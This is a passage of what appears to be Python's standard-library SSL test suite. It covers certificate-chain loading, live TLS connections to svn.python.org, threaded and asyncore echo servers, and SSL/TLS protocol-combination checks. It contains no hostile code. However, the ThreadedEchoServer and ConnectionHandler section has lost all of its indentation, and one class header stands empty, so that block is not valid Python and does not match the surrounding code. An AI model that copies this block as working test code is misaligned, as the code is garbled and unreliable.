        # Combined key and cert in a single file
        ctx.load_cert_chain(CERTFILE)
        ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
        self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
        with self.assertRaises(IOError) as cm:
            ctx.load_cert_chain(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(BADCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(EMPTYCERT)
        # Separate key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY)
        ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
        ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYKEY)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
        # Mismatching key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
            ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
    def test_load_verify_locations(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(CERTFILE)
        ctx.load_verify_locations(cafile=CERTFILE, capath=None)
        ctx.load_verify_locations(BYTES_CERTFILE)
        ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
        self.assertRaises(TypeError, ctx.load_verify_locations)
        self.assertRaises(TypeError, ctx.load_verify_locations, None, None)
        with self.assertRaises(IOError) as cm:
            ctx.load_verify_locations(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_verify_locations(BADCERT)
        ctx.load_verify_locations(CERTFILE, CAPATH)
        ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
        # Issue #10989: crash if the second argument type is invalid
        self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
    @skip_if_broken_ubuntu_ssl
    def test_session_stats(self):
        # A freshly created context must report all-zero session statistics.
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.session_stats(), {
                'number': 0,
                'connect': 0,
                'connect_good': 0,
                'connect_renegotiate': 0,
                'accept': 0,
                'accept_good': 0,
                'accept_renegotiate': 0,
                'hits': 0,
                'misses': 0,
                'timeouts': 0,
                'cache_full': 0,
            })
    def test_set_default_verify_paths(self):
        # There's not much we can do to test that it acts as expected,
        # so just check it doesn't crash or raise an exception.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_default_verify_paths()
class NetworkedTests(unittest.TestCase):
    """Tests that connect to live Internet hosts (mostly svn.python.org:443);
    each test is guarded by support.transient_internet(), which skips the
    test when the remote host is unreachable."""
    def test_connect(self):
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE)
            try:
                s.connect(("svn.python.org", 443))
                # With CERT_NONE no peer certificate is validated or returned.
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()
            # this should fail because we have no verification certs
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED)
            self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                                   s.connect, ("svn.python.org", 443))
            s.close()
            # this should succeed because we specify the root cert
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                s.connect(("svn.python.org", 443))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()
    def test_connect_ex(self):
        # Issue #11326: check connect_ex() implementation
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()
    def test_non_blocking_connect_ex(self):
        # Issue #11326: non-blocking connect_ex() should allow handshake
        # to proceed after the socket gets ready.
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                s.setblocking(False)
                rc = s.connect_ex(('svn.python.org', 443))
                # EWOULDBLOCK under Windows, EINPROGRESS elsewhere
                self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
                # Wait for connect to finish
                select.select([], [s], [], 5.0)
                # Non-blocking handshake
                while True:
                    try:
                        s.do_handshake()
                        break
                    except ssl.SSLError as err:
                        if err.args[0] == ssl.SSL_ERROR_WANT_READ:
                            select.select([s], [], [], 5.0)
                        elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
                            select.select([], [s], [], 5.0)
                        else:
                            raise
                # SSL established
                self.assertTrue(s.getpeercert())
            finally:
                s.close()
    def test_timeout_connect_ex(self):
        # Issue #12065: on a timeout, connect_ex() should return the original
        # errno (mimicking the behaviour of non-SSL sockets).
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                # Timeout so small the connect cannot normally complete.
                s.settimeout(0.0000001)
                rc = s.connect_ex(('svn.python.org', 443))
                if rc == 0:
                    self.skipTest("svn.python.org responded too quickly")
                self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
            finally:
                s.close()
    def test_connect_with_context(self):
        with support.transient_internet("svn.python.org"):
            # Same as test_connect, but with a separately created context
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()
            # Same with a server hostname
            s = ctx.wrap_socket(socket.socket(socket.AF_INET),
                                server_hostname="svn.python.org")
            if ssl.HAS_SNI:
                s.connect(("svn.python.org", 443))
                s.close()
            else:
                self.assertRaises(ValueError, s.connect, ("svn.python.org", 443))
            # This should fail because we have no verification certs
            ctx.verify_mode = ssl.CERT_REQUIRED
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                                   s.connect, ("svn.python.org", 443))
            s.close()
            # This should succeed because we specify the root cert
            ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()
    def test_connect_capath(self):
        # Verify server certificates using the `capath` argument
        # NOTE: the subject hashing algorithm has been changed between
        # OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
        # contain both versions of each certificate (same content, different
        # filename) for this test to be portable across OpenSSL releases.
        with support.transient_internet("svn.python.org"):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()
            # Same with a bytes `capath` argument
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=BYTES_CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()
    @unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
    def test_makefile_close(self):
        # Issue #5238: creating a file-like object with makefile() shouldn't
        # delay closing the underlying "real socket" (here tested with its
        # file descriptor, hence skipping the test under Windows).
        with support.transient_internet("svn.python.org"):
            ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
            ss.connect(("svn.python.org", 443))
            fd = ss.fileno()
            f = ss.makefile()
            f.close()
            # The fd is still open
            os.read(fd, 0)
            # Closing the SSL socket should close the fd too
            ss.close()
            gc.collect()
            with self.assertRaises(OSError) as e:
                os.read(fd, 0)
            self.assertEqual(e.exception.errno, errno.EBADF)
    def test_non_blocking_handshake(self):
        with support.transient_internet("svn.python.org"):
            s = socket.socket(socket.AF_INET)
            s.connect(("svn.python.org", 443))
            s.setblocking(False)
            s = ssl.wrap_socket(s,
                                cert_reqs=ssl.CERT_NONE,
                                do_handshake_on_connect=False)
            count = 0
            # Retry the handshake until OpenSSL no longer wants more I/O.
            while True:
                try:
                    count += 1
                    s.do_handshake()
                    break
                except ssl.SSLError as err:
                    if err.args[0] == ssl.SSL_ERROR_WANT_READ:
                        select.select([s], [], [])
                    elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
                        select.select([], [s], [])
                    else:
                        raise
            s.close()
            if support.verbose:
                sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
    def test_get_server_certificate(self):
        with support.transient_internet("svn.python.org"):
            pem = ssl.get_server_certificate(("svn.python.org", 443))
            if not pem:
                self.fail("No server certificate on svn.python.org:443!")
            try:
                pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=CERTFILE)
            except ssl.SSLError as x:
                #should fail
                if support.verbose:
                    sys.stdout.write("%s\n" % x)
            else:
                self.fail("Got server certificate %s for svn.python.org!" % pem)
            pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            if not pem:
                self.fail("No server certificate on svn.python.org:443!")
            if support.verbose:
                sys.stdout.write("\nVerified certificate for svn.python.org:443 is\n%s\n" % pem)
    def test_ciphers(self):
        remote = ("svn.python.org", 443)
        with support.transient_internet(remote[0]):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE, ciphers="ALL")
            s.connect(remote)
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")
            s.connect(remote)
            # Error checking can happen at instantiation or when connecting
            with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
                with socket.socket(socket.AF_INET) as sock:
                    s = ssl.wrap_socket(sock,
                                        cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
                    s.connect(remote)
    def test_algorithms(self):
        # Issue #8484: all algorithms should be available when verifying a
        # certificate.
        # SHA256 was added in OpenSSL 0.9.8
        if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
            self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
        # https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
        remote = ("sha256.tbs-internet.com", 443)
        sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
        with support.transient_internet("sha256.tbs-internet.com"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=sha256_cert,)
            try:
                s.connect(remote)
                if support.verbose:
                    sys.stdout.write("\nCipher with %r is %r\n" %
                                     (remote, s.cipher()))
                    sys.stdout.write("Certificate is:\n%s\n" %
                                     pprint.pformat(s.getpeercert()))
            finally:
                s.close()
# The threaded server tests below are optional: record whether the
# threading module is importable so they can be skipped when it is not.
try:
    import threading
except ImportError:
    _have_threads = False
else:
    _have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
except ssl.SSLError:
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except socket.error:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
threading.Thread.__init__(self)
self.daemon = True
    def start(self, flag=None):
        # Remember the optional "server is ready" event (set by run()),
        # then start the thread normally.
        self.flag = flag
        threading.Thread.start(self)
    def run(self):
        # Accept loop of the server thread.  The short timeout on the
        # listening socket lets the loop notice stop() clearing
        # self.active within ~50ms.
        self.sock.settimeout(0.05)
        self.sock.listen(5)
        self.active = True
        if self.flag:
            # signal an event
            self.flag.set()
        while self.active:
            try:
                newconn, connaddr = self.sock.accept()
                if support.verbose and self.chatty:
                    sys.stdout.write(' server: new connection from '
                                     + repr(connaddr) + '\n')
                handler = self.ConnectionHandler(self, newconn, connaddr)
                handler.start()
            except socket.timeout:
                # Expected: just re-check self.active and keep waiting.
                pass
            except KeyboardInterrupt:
                self.stop()
        self.sock.close()
    def stop(self):
        # Ask the accept loop in run() to exit; run() closes the socket.
        self.active = False
class AsyncoreEchoServer(threading.Thread):
    # this one's based on asyncore.dispatcher
    class EchoServer (asyncore.dispatcher):
        class ConnectionHandler (asyncore.dispatcher_with_send):
            # One handler per accepted connection: wraps the socket in SSL
            # (non-blocking handshake) and echoes payloads back lower-cased.
            def __init__(self, conn, certfile):
                self.socket = ssl.wrap_socket(conn, server_side=True,
                                              certfile=certfile,
                                              do_handshake_on_connect=False)
                asyncore.dispatcher_with_send.__init__(self, self.socket)
                self._ssl_accepting = True
                self._do_ssl_handshake()
            def readable(self):
                if isinstance(self.socket, ssl.SSLSocket):
                    # Drain data already buffered inside the SSL layer;
                    # select() cannot see it on the raw socket.
                    while self.socket.pending() > 0:
                        self.handle_read_event()
                return True
            def _do_ssl_handshake(self):
                # Drive the non-blocking handshake one step: retry later on
                # WANT_READ/WANT_WRITE, close on EOF or aborted connection.
                try:
                    self.socket.do_handshake()
                except ssl.SSLError as err:
                    if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
                                       ssl.SSL_ERROR_WANT_WRITE):
                        return
                    elif err.args[0] == ssl.SSL_ERROR_EOF:
                        return self.handle_close()
                    raise
                except socket.error as err:
                    if err.args[0] == errno.ECONNABORTED:
                        return self.handle_close()
                else:
                    # Handshake finished; switch to normal echo mode.
                    self._ssl_accepting = False
            def handle_read(self):
                if self._ssl_accepting:
                    self._do_ssl_handshake()
                else:
                    data = self.recv(1024)
                    if support.verbose:
                        sys.stdout.write(" server: read %s from client\n" % repr(data))
                    if not data:
                        self.close()
                    else:
                        self.send(data.lower())
            def handle_close(self):
                self.close()
                if support.verbose:
                    sys.stdout.write(" server: closed connection %s\n" % self.socket)
            def handle_error(self):
                # Let errors propagate so the test fails loudly.
                raise
        def __init__(self, certfile):
            self.certfile = certfile
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.port = support.bind_port(sock, '')
            asyncore.dispatcher.__init__(self, sock)
            self.listen(5)
        def handle_accepted(self, sock_obj, addr):
            if support.verbose:
                sys.stdout.write(" server: new connection from %s:%s\n" %addr)
            self.ConnectionHandler(sock_obj, self.certfile)
        def handle_error(self):
            raise
    def __init__(self, certfile):
        # Thread wrapper that owns the asyncore dispatcher above.
        self.flag = None
        self.active = False
        self.server = self.EchoServer(certfile)
        self.port = self.server.port
        threading.Thread.__init__(self)
        self.daemon = True
    def __str__(self):
        return "<%s %s>" % (self.__class__.__name__, self.server)
    def start (self, flag=None):
        self.flag = flag
        threading.Thread.start(self)
    def run(self):
        # Pump the asyncore event loop until stop() clears self.active.
        self.active = True
        if self.flag:
            self.flag.set()
        while self.active:
            try:
                asyncore.loop(1)
            except:
                pass
    def stop(self):
        self.active = False
        self.server.close()
def bad_cert_test(certfile):
    """
    Launch a server with CERT_REQUIRED, and check that trying to
    connect to it with the given client certificate fails.

    Any of SSLError / socket.error / IOError(ENOENT) counts as the
    expected failure; a successful connection raises AssertionError.
    """
    server = ThreadedEchoServer(CERTFILE,
                                certreqs=ssl.CERT_REQUIRED,
                                cacerts=CERTFILE, chatty=False,
                                connectionchatty=False)
    flag = threading.Event()
    server.start(flag)
    # wait for it to start
    flag.wait()
    # try to connect
    try:
        try:
            with socket.socket() as sock:
                s = ssl.wrap_socket(sock,
                                    certfile=certfile,
                                    ssl_version=ssl.PROTOCOL_TLSv1)
                s.connect((HOST, server.port))
        except ssl.SSLError as x:
            if support.verbose:
                sys.stdout.write("\nSSLError is %s\n" % x.args[1])
        except socket.error as x:
            if support.verbose:
                sys.stdout.write("\nsocket.error is %s\n" % x.args[1])
        except IOError as x:
            # A missing cert file surfaces as ENOENT; anything else is a
            # real error and must propagate.
            if x.errno != errno.ENOENT:
                raise
            if support.verbose:
                # Fixed: the message used "\I" (a literal backslash + "I",
                # an unrecognized escape) where a newline was intended,
                # matching the "\nSSLError"/"\nsocket.error" lines above.
                sys.stdout.write("\nIOError is %s\n" % str(x))
        else:
            raise AssertionError("Use of invalid cert should have failed!")
    finally:
        server.stop()
        server.join()
def server_params_test(client_context, server_context, indata=b"FOO\n",
                       chatty=True, connectionchatty=False):
    """
    Launch a server, connect a client to it and try various reads
    and writes.

    The server echoes every payload back lower-cased; a mismatch raises
    AssertionError.  ``connectionchatty`` only controls client-side
    logging here -- the server is always started with
    connectionchatty=False.
    """
    server = ThreadedEchoServer(context=server_context,
                                chatty=chatty,
                                connectionchatty=False)
    flag = threading.Event()
    server.start(flag)
    # wait for it to start
    flag.wait()
    # try to connect
    try:
        s = client_context.wrap_socket(socket.socket())
        s.connect((HOST, server.port))
        # Exercise bytes, bytearray and memoryview payloads alike.
        for arg in [indata, bytearray(indata), memoryview(indata)]:
            if connectionchatty:
                if support.verbose:
                    sys.stdout.write(
                        " client: sending %r...\n" % indata)
            s.write(arg)
            outdata = s.read()
            if connectionchatty:
                if support.verbose:
                    sys.stdout.write(" client: read %r\n" % outdata)
            if outdata != indata.lower():
                raise AssertionError(
                    "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
                    % (outdata[:20], len(outdata),
                       indata[:20].lower(), len(indata)))
        s.write(b"over\n")
        if connectionchatty:
            if support.verbose:
                sys.stdout.write(" client: closing connection.\n")
        s.close()
    finally:
        server.stop()
        server.join()
def try_protocol_combo(server_protocol, client_protocol, expect_success,
                       certsreqs=None, server_options=0, client_options=0):
    # Run one client/server handshake with the given protocol pair and
    # assert the outcome matches expect_success: a mismatch is allowed to
    # fail with SSLError or ECONNRESET; an unexpected success (or an
    # unexpected failure) raises.
    if certsreqs is None:
        certsreqs = ssl.CERT_NONE
    certtype = {
        ssl.CERT_NONE: "CERT_NONE",
        ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
        ssl.CERT_REQUIRED: "CERT_REQUIRED",
    }[certsreqs]
    if support.verbose:
        # Braces in the log line flag combinations expected to fail.
        formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
        sys.stdout.write(formatstr %
                         (ssl.get_protocol_name(client_protocol),
                          ssl.get_protocol_name(server_protocol),
                          certtype))
    client_context = ssl.SSLContext(client_protocol)
    client_context.options = ssl.OP_ALL | client_options
    server_context = ssl.SSLContext(server_protocol)
    server_context.options = ssl.OP_ALL | server_options
    for ctx in (client_context, server_context):
        ctx.verify_mode = certsreqs
        # NOTE: we must enable "ALL" ciphers, otherwise an SSLv23 client
        # will send an SSLv3 hello (rather than SSLv2) starting from
        # OpenSSL 1.0.0 (see issue #8322).
        ctx.set_ciphers("ALL")
        ctx.load_cert_chain(CERTFILE)
        ctx.load_verify_locations(CERTFILE)
    try:
        server_params_test(client_context, server_context,
                           chatty=False, connectionchatty=False)
    # Protocol mismatch can result in either an SSLError, or a
    # "Connection reset by peer" error.
    except ssl.SSLError:
        if expect_success:
            raise
    except socket.error as e:
        if expect_success or e.errno != errno.ECONNRESET:
            raise
    else:
        if not expect_success:
            raise AssertionError(
                "Client protocol %s succeeded with server protocol %s!"
                % (ssl.get_protocol_name(client_protocol),
                   ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
    # Client/server tests that require a live background server thread
    # (ThreadedEchoServer, AsyncoreEchoServer or an ad-hoc listener).
    @skip_if_broken_ubuntu_ssl
    def test_echo(self):
        """Basic test of an SSL client connecting to a server"""
        if support.verbose:
            sys.stdout.write("\n")
        for protocol in PROTOCOLS:
            context = ssl.SSLContext(protocol)
            context.load_cert_chain(CERTFILE)
            server_params_test(context, context,
                               chatty=True, connectionchatty=True)
    def test_getpeercert(self):
        # Validate the decoded peer-certificate dict returned by
        # SSLSocket.getpeercert() against the known test certificate.
        if support.verbose:
            sys.stdout.write("\n")
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.verify_mode = ssl.CERT_REQUIRED
        context.load_verify_locations(CERTFILE)
        context.load_cert_chain(CERTFILE)
        server = ThreadedEchoServer(context=context, chatty=False)
        flag = threading.Event()
        server.start(flag)
        # wait for it to start
        flag.wait()
        # try to connect
        try:
            s = context.wrap_socket(socket.socket())
            s.connect((HOST, server.port))
            cert = s.getpeercert()
            self.assertTrue(cert, "Can't get peer certificate.")
            cipher = s.cipher()
            if support.verbose:
                sys.stdout.write(pprint.pformat(cert) + '\n')
                sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
            if 'subject' not in cert:
                self.fail("No subject field in certificate: %s." %
                          pprint.pformat(cert))
            if ((('organizationName', 'Python Software Foundation'),)
                not in cert['subject']):
                self.fail(
                    "Missing or invalid 'organizationName' field in certificate subject; "
                    "should be 'Python Software Foundation'.")
            self.assertIn('notBefore', cert)
            self.assertIn('notAfter', cert)
            before = ssl.cert_time_to_seconds(cert['notBefore'])
            after = ssl.cert_time_to_seconds(cert['notAfter'])
            self.assertLess(before, after)
            s.close()
        finally:
            server.stop()
            server.join()
    def test_empty_cert(self):
        """Connecting with an empty cert file"""
        bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
                                   "nullcert.pem"))
    def test_malformed_cert(self):
        """Connecting with a badly formatted certificate (syntax error)"""
        bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
                                   "badcert.pem"))
    def test_nonexisting_cert(self):
        """Connecting with a non-existing cert file"""
        bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
                                   "wrongcert.pem"))
    def test_malformed_key(self):
        """Connecting with a badly formatted key (syntax error)"""
        bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
                                   "badkey.pem"))
    def test_rude_shutdown(self):
        """A brutal shutdown of an SSL server should raise an IOError
        in the client when attempting handshake.
        """
        listener_ready = threading.Event()
        listener_gone = threading.Event()
        s = socket.socket()
        port = support.bind_port(s, HOST)
        # `listener` runs in a thread. It sits in an accept() until
        # the main thread connects. Then it rudely closes the socket,
        # and sets Event `listener_gone` to let the main thread know
        # the socket is gone.
        def listener():
            s.listen(5)
            listener_ready.set()
            newsock, addr = s.accept()
            newsock.close()
            s.close()
            listener_gone.set()
        def connector():
            listener_ready.wait()
            with socket.socket() as c:
                c.connect((HOST, port))
                listener_gone.wait()
                try:
                    ssl_sock = ssl.wrap_socket(c)
                except IOError:
                    pass
                else:
                    self.fail('connecting to closed SSL socket should have failed')
        t = threading.Thread(target=listener)
        t.start()
        try:
            connector()
        finally:
            t.join()
    @skip_if_broken_ubuntu_ssl
    @unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'), "need SSLv2")
    def test_protocol_sslv2(self):
        """Connecting to an SSLv2 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
        # SSLv23 client with specific SSL options
        if no_sslv2_implies_sslv3_hello():
            # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
            try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
                               client_options=ssl.OP_NO_SSLv2)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True,
                           client_options=ssl.OP_NO_SSLv3)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True,
                           client_options=ssl.OP_NO_TLSv1)
    @skip_if_broken_ubuntu_ssl
    def test_protocol_sslv23(self):
        """Connecting to an SSLv23 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try:
                try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
            except (ssl.SSLError, socket.error) as x:
                # this fails on some older versions of OpenSSL (0.9.7l, for instance)
                if support.verbose:
                    sys.stdout.write(
                        " SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
                        % str(x))
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
        # Server with specific SSL options
